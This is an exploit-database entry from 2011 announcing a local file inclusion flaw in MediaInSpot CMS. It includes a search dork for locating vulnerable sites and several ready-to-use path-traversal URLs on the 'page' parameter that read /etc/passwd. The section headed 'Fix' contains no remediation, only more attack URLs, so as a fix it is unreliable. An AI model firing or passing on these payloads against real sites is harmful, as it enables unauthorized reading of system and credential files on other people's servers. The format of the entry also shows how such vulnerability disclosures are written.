MediaInSpot CMS - Local File Inclusion (2)

Author: wlhaan haker
type: webapps
platform: php
port: 
date_added: 2011-05-16 
date_updated: 2011-05-16 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

#Name : Media In Spot LFI Vulnerability
#Date : May,16 2011
#Vendor Url :http:http://www.mediainspot.com/

#Dork:"
"Powred By Media In Spot""

#Author : wlhaan haker <iit[at]hotmail.com>


###############################################################################################################
Exploit:
http://server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

###############################################################################################################
Fix:

demo

http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd